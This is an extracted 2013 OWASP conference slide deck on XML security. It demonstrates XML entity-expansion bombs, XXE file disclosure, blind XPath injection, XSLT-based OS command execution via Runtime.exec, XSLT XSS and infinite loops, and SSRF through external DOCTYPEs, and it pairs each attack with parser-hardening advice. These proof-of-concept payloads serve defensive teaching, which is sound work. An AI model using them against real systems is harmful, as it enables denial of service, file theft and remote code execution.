XML Attack Surface - Pierre Ernst (OWASP Ottawa)

OWASP

Pierre Ernst, 2013

XML Attack Surface

Business Analytics Security Competency Group

Pierre Ernst, 2013 322/

OWASP

XML is Pervasive

Pierre Ernst, 2013 323/

OWASP

XML intro■Born in 1998 (see initial specifications)■Data interchange format

– International languages support– Text based – Human readable

■Parsers– DOM– SAX, rooted in Ottawa (see bio)– StAX

■Complementary technologies and standards– XML Validation (DTD, XSD, ...)– XML Transformation (XSLT)– XML Query (XQuery, XPath)

Pierre Ernst, 2013 324/

OWASP

Is XML Secure?

■Nothing wrong with the standard itself■Most vulnerabilities due to

– Libraries/Tools misconfiguration– Insufficient validation of untrusted input

known, reported security vulnerabilities (see CVE search)

Pierre Ernst, 2013 325/

OWASP

XML Bomb

■CWE-776: Denial of service (memory exhaustion)■Amit Klein, 2002 (see BugTraq)■XML entity expansion

<!DOCTYPE ibm [ <!ENTITY ernst128 "pierre"> <!ENTITY ernst127 "&ernst128;&ernst128;"> ... <!ENTITY ernst002 "&ernst003;&ernst003;"> <!ENTITY ernst001 "&ernst002;&ernst002;"> <!ENTITY ernst000 "&ernst001;&ernst001;">]><ibm>&ernst000;</ibm>

Pierre Ernst, 2013 326/

OWASP

Modus Operandi

POST /request HTTP/1.1

1

2

<ibm>&ernst000;</ibm><ibm>&ernst001;&ernst001;</ibm><ibm>&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;</ibm>

<ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>

Attacker Vulnerable Server

Pierre Ernst, 2013 327/

OWASP

Demo #1: Server Crash with XML Bomb

(Source code available on demand)

Pierre Ernst, 2013 328/

OWASP

Variation: “Quadratic Blowup Attack”

■Amit Klein (see MSDN article)■Uses one single entity of size 50KB■Reference the entity 50,000 times■Useful to bypass

FEATURE_SECURE_PROCESSING protection– Limits entity expansions to

• 100,000 (IBM)• 64,000 (Oracle)

<!DOCTYPE pierre [ <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">]><pierre>&e;&e;&e;...&e;&e;&e;</pierre>

Pierre Ernst, 2013 329/

OWASP

Protection

DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);

Pierre Ernst, 2013 3210/

OWASP

External Entity Reference (XXE)

■CWE-611: Information Disclosure■Gregory Steuck, 2002 (see BugTraq)■Requires the server to include user-supplied data in

the response

<!DOCTYPE pierre [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">]><pierre>&ernst;</pierre>

Pierre Ernst, 2013 3211/

OWASP

Modus Operandi

POST /request HTTP/1.1

1

2<pierre>[... content of the file on the server...]</pierre>

<pierre> &ernst;</pierre>

3

HTTP/1.1 200 OKContent-Type: text/xml

<response> Unknown service [... content of the file on the server...]</response>

Attacker Vulnerable Server

Pierre Ernst, 2013 3212/

OWASP

Demo #2: File Content Disclosure with XXE

(Source code available on demand)

Pierre Ernst, 2013 3213/

OWASP

Protection

DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);

Pierre Ernst, 2013 3214/

OWASP

//users/user[name/text()= and password/text()= ]/name/text() //users/user[name/text()= and password/text()= ]/name/text()

'' or ''=''

'i8simon'

'pierre'

Blind Xpath Injection (“XML Injection”)

■CWE-643: Abuse of Functionality■Amit Klein, 2004 (see white-paper)■User input is embedded as-is in Xpath statement<users> <user> <name>pierre</name> <password>i8simon</password> </user> <user> <name>trevor</name> <password>mee2</password> </user> </users>

pierre

***********'' or ''=''

' or ''='

***********

Pierre Ernst, 2013 3215/

OWASP

Modus Operandi

POST /login HTTP/1.1

1

Attacker Vulnerable Server

//users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()

2

pierretrevor 3

HTTP/1.1 200 OKContent-Type: text/html

Pierre Ernst, 2013 3216/

OWASP

Demo #3: Blind Xpath Injection

(Source code available on demand)

Pierre Ernst, 2013 3217/

OWASP

Variation: Read System Properties

■ JAXP implementation:–IBM–Oracle

■ Interesting properties:–os.version–user.name–java.class.path–sun.java.command

system-property('sun.java.command')

Pierre Ernst, 2013 3218/

OWASP

Protection

■ Input Validation.■ “[A-Za-z0-9_\-]+” in our example.

Pierre Ernst, 2013 3219/

OWASP

Code Injection during XSLT

■CWE-94: Improper Control of Generation of Code■When the attacker can control the XML style sheet

applied to an XML document.■Uses transformer engine extension capabilities

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="xalan://java.lang.Runtime" exclude-result-prefixes="rt"> <xsl:template match="/"> <xsl:variable name="obj" select="rt:getRuntime()"/>

<xsl:value-of select="rt:exec($obj,'calc.exe')"/> </xsl:template></xsl:stylesheet>

Pierre Ernst, 2013 3220/

OWASP

Modus Operandi

GET /request?doc=...&stylesheet=... HTTP/1.1

1

<doc>whatever</doc>

<stylesheet>malicious</stylesheet>

2

Attacker Vulnerable Server

Load class java.lang.Runtime

Call exec() method

3

Pierre Ernst, 2013 3221/

OWASP

Demo #4: Remote OS Command Injection

(Source code available on demand)

Pierre Ernst, 2013 3222/

OWASP

Variation #1: Universal XXE

<!DOCTYPE xsl:stylesheet [ <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">]><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

<xsl:template match="/"> &ernst; </xsl:template>

</xsl:stylesheet>

●“Universal”: you always see the entity in the response

Pierre Ernst, 2013 3223/

OWASP

Variation #2: Infinite Loop

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template name="loop"> <xsl:call-template name="loop"/> </xsl:template>

<xsl:template match="/"> <xsl:call-template name="loop"/> </xsl:template></xsl:stylesheet>

1

2

Pierre Ernst, 2013 3224/

OWASP

Variation #3: Cross-Site Scripting (XSS)

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:xhtml="http://www.w3.org/1999/xhtml">

<xsl:output method="html"/> <xsl:template match="/"> <xhtml:script>alert('XSS');</xhtml:script> </xsl:template>

</xsl:stylesheet>

Pierre Ernst, 2013 3225/

OWASP

Protection

■Several ways to abuse XML Stylesheet Transforms.■Users should never been able to use custom XML

stylesheets.

Pierre Ernst, 2013 3226/

OWASP

Server Side Request Forgery (SSRF)

■CWE-601: Open Redirect, but server-to-server■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)■XML vectors:

– Xml eXternal Entities (XXE)– Xinclude– External Doctype inclusion:

<!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">

<pierre/>

Pierre Ernst, 2013 3227/

OWASP

POST /request HTTP/1.1Content-Type: application/xmlContent-Lenght: 666

<?xml version=”1.0”?>...

1

Attacker Vulnerable Server

Modus Operandi

Internal Service

2whatever

Pierre Ernst, 2013 3228/

OWASP

Protection

DOM SAX StAXfactory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);

Pierre Ernst, 2013 3229/

OWASP

Variation: Exotic Java URL Handlers

■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)

Pierre Ernst, 2013 3230/

OWASP

Conclusions

■Always configure your XML parsers to disallow Doctype.

–From a server's perspective, clients should not be able to define the grammar of the request anyway

–Secure Processing Flag is not enough–Preventing external entity expansion is not

enough

■XPath: validate user's input■XSLT: avoid at any cost■Always apply Java patches from vendors

Pierre Ernst, 2013 3231/

OWASP

■10 years as Software Developer

■5 years as Penetration Tester– 750+ vulns– Manual Code Review– Manual Black Box Testing– Java, XML, Open Source, …

https://twitter.com/e_rnst

http://ca.linkedin.com/in/pernst

Pierre Ernst

[email protected]

Pierre Ernst, 2013 3232/

OWASP

Questions & Answers